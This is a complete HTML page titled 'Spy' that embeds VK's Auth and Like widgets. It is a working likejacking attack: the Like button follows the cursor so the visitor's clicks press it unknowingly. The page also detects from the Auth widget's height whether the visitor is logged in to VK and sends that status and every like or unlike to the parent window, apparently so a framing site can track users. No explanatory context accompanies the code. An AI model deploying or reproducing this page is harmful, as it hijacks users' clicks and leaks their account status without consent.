<!DOCTYPE html>
<html>
  <head>
    <meta charset='utf-8'>
    <title>Шпион</title>
    <script src='https://vk.com/js/api/openapi.js?105'></script>
    <script src='https://code.jquery.com/jquery-2.2.1.min.js'></script>
    <style>
      body > iframe { display: none !important; }
    </style>
  </head>
  <body>
    <div id='like'></div>
    <div id='auth'></div>

    <script>
      window.onload = function(){
        VK.init({apiId: 5358397, onlyWidgets: true});
        VK.Widgets.Auth('auth', { width: '200px' });
        VK.Widgets.Like('like', {type: 'button'});

        setTimeout(function(){
          if ($('#auth').height() == 80)
            window.parent.postMessage('not-auth', '*');
          $('#auth').hide();
        }, 2000);

        var like = $('#like');
        $(window).on('mousemove', function(e) {
          like.css({
            left: e.pageX-50,
            top: e.pageY-15
          });
        });

        VK.Observer.subscribe('widgets.like.liked', function(){
          window.parent.postMessage('liked', '*');
        });
        VK.Observer.subscribe('widgets.like.unliked', function(){
          window.parent.postMessage('disliked', '*');
        });
      }
    </script>
  </body>
</html>
